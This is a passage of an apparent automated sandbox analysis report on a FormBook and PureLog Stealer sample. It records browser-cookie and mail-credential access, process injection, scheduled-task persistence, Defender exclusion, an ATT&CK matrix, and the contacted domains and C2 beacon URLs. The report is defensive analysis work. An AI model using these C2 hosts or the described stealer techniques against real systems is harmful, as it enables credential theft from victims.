                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeQueries volume information: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.26c1140.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.27089b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.28f8b00.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.24d10ec.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.36139f0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.28fbb30.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.2727a28.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.4fb0000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.2917b78.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.28fbb30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.270b9e0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.28f9b18.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.270b9e0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.26c1140.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.6850000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.27099c8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2100365796.0000000006850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2086201250.00000000026E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2086201250.0000000002727000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2099884400.0000000004FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2169047373.0000000002917000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2169047373.0000000002691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2086201250.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2090039067.00000000035B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2169047373.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\SysWOW64\print.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\SysWOW64\print.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                    Remote Access Functionality

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.26c1140.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.27089b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.28f8b00.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.24d10ec.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.36139f0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.28fbb30.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.2727a28.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.4fb0000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.2917b78.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.28fbb30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.270b9e0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.28f9b18.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.270b9e0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.tehuvFgZlLZK.exe.26c1140.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.6850000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UnmxRI.exe.27099c8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2100365796.0000000006850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2086201250.00000000026E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2086201250.0000000002727000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2099884400.0000000004FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2169047373.0000000002917000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2169047373.0000000002691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2086201250.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2090039067.00000000035B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2169047373.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		412
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		221
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory2
                    Process Discovery                    		Remote Desktop Protocol11
                    Archive Collected Data                    		3
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Abuse Elevation Control Mechanism                    		41
                    Virtualization/Sandbox Evasion                    		Security Account Manager41
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares1
                    Data from Local System                    		4
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading                    		412
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture4
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                    Deobfuscate/Decode Files or Information                    		LSA Secrets2
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Abuse Elevation Control Mechanism                    		Cached Domain Credentials113
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                    Obfuscated Files or Information                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Software Packing                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Timestomp                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    DLL Side-Loading                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501599 Sample: UnmxRI.exe Startdate: 30/08/2024 Architecture: WINDOWS Score: 100 59 www.heilao9.xyz 2->59 61 www.uty803.com 2->61 63 19 other IPs or domains 2->63 75 Multi AV Scanner detection for domain / URL 2->75 77 Suricata IDS alerts for network traffic 2->77 79 Malicious sample detected (through community Yara rule) 2->79 83 12 other signatures 2->83 10 UnmxRI.exe 7 2->10         started        14 tehuvFgZlLZK.exe 5 2->14         started        signatures3 81 Performs DNS queries to domains with low reputation 59->81 process4 file5 51 C:\Users\user\AppData\...\tehuvFgZlLZK.exe, PE32 10->51 dropped 53 C:\Users\...\tehuvFgZlLZK.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmpB814.tmp, XML 10->55 dropped 57 C:\Users\user\AppData\...\UnmxRI.exe.log, ASCII 10->57 dropped 93 Uses schtasks.exe or at.exe to add and modify task schedules 10->93 95 Adds a directory exclusion to Windows Defender 10->95 16 UnmxRI.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        97 Multi AV Scanner detection for dropped file 14->97 99 Machine Learning detection for dropped file 14->99 25 schtasks.exe 1 14->25         started        27 tehuvFgZlLZK.exe 14->27         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 16->71 29 NUJqNHNKrrpXWLOEvky.exe 16->29 injected 73 Loading BitLocker PowerShell Module 19->73 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        process9 signatures10 101 Found direct / indirect Syscall (likely to bypass EDR) 29->101 42 print.exe 13 29->42         started        process11 signatures12 85 Tries to steal Mail credentials (via file / registry access) 42->85 87 Tries to harvest and steal browser information (history, passwords, etc) 42->87 89 Writes to foreign memory regions 42->89 91 4 other signatures 42->91 45 NUJqNHNKrrpXWLOEvky.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 65 www.hugelmann.org 216.40.34.41, 49751, 49752, 49753 TUCOWSCA Canada 45->65 67 parkingpage.namecheap.com 91.195.240.19, 49717, 49727, 49728 SEDO-ASDE Germany 45->67 69 7 other IPs or domains 45->69 103 Found direct / indirect Syscall (likely to bypass EDR) 45->103 signatures15

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    UnmxRI.exe66%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                    UnmxRI.exe69%VirustotalBrowse
                    UnmxRI.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe66%ReversingLabsByteCode-MSIL.Backdoor.FormBook

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    gpcamservices.com8%VirustotalBrowse
                    www.otomain.info0%VirustotalBrowse
                    www.sportspaj.com6%VirustotalBrowse
                    www.theranchobizarro.com1%VirustotalBrowse
                    nexgen-gaming.com10%VirustotalBrowse
                    noobblaster.com8%VirustotalBrowse
                    www.mlfloor.net1%VirustotalBrowse
                    www.7789552398763.net3%VirustotalBrowse
                    parkingpage.namecheap.com0%VirustotalBrowse
                    www.nathanladd.software7%VirustotalBrowse
                    www.gpcamservices.com10%VirustotalBrowse
                    www.pheonix-travels.com7%VirustotalBrowse
                    www.sciencebot.sbs2%VirustotalBrowse
                    www.noobblaster.com6%VirustotalBrowse
                    www.nexgen-gaming.com3%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed8810%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    http://schema.org0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://mozilla.org0/0%URL Reputationsafe
                    https://crash-reports.mozilla.com/submit?id=0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://www.theranchobizarro.com/terms0%Avira URL Cloudsafe
                    https://s3-us-west-2.amazonaws.com/listingzen/agents/agent4/450/agent1482359813.jpg0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/fgkz/100%Avira URL Cloudmalware
                    https://www.instagram.com/hover_domains0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/img/site/dark_logo.png0%Avira URL Cloudsafe
                    http://www.pheonix-travels.com/fgkz/?4f2t8=qUFBQvWBSx+bgMqyDmLQ5iNb4eTiibWqPMlygN/fc4+dM2Q0fApyvpqDNInFWFQ7PUEWbfd7zdq6gjmLUkGdSLdX5yRbFI8ZXQ==&nFeHa=dbNpTj0%Avira URL Cloudsafe
                    http://www.slimdut.top/fgkz/0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/pricing#pricing0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/fgkz/5%VirustotalBrowse
                    http://www.theranchobizarro.com/img/site/dark_logo.png0%VirustotalBrowse
                    http://www.theranchobizarro.com/img/site/light_logo.png0%Avira URL Cloudsafe
                    https://performance.radar.cloudflare.com/beacon.js0%Avira URL Cloudsafe
                    http://www.slimdut.top/fgkz/?4f2t8=+meHlBDXvFG0tp5IHuNp5aNfi3jbma4/KPg1jYwxKUxzXvorilFM4RqNjl5oI+tAWQpMLL6Kz03IcJJlzmvukn6IT7E7w1sf4w==&nFeHa=dbNpTj0%Avira URL Cloudsafe
                    http://www.theranchobizarro.com/img/site/light_logo.png0%VirustotalBrowse
                    https://www.cloudflare.com/login?utm_source=error_100x0%Avira URL Cloudsafe
                    https://www.instagram.com/hover_domains0%VirustotalBrowse
                    http://www.theranchobizarro.com/pricing#pricing0%VirustotalBrowse
                    http://www.theranchobizarro.com/terms0%VirustotalBrowse
                    https://sparrow.cloudflare.com/api/v1/event0%Avira URL Cloudsafe
                    http://ww1.nexgen-gaming.com0%Avira URL Cloudsafe
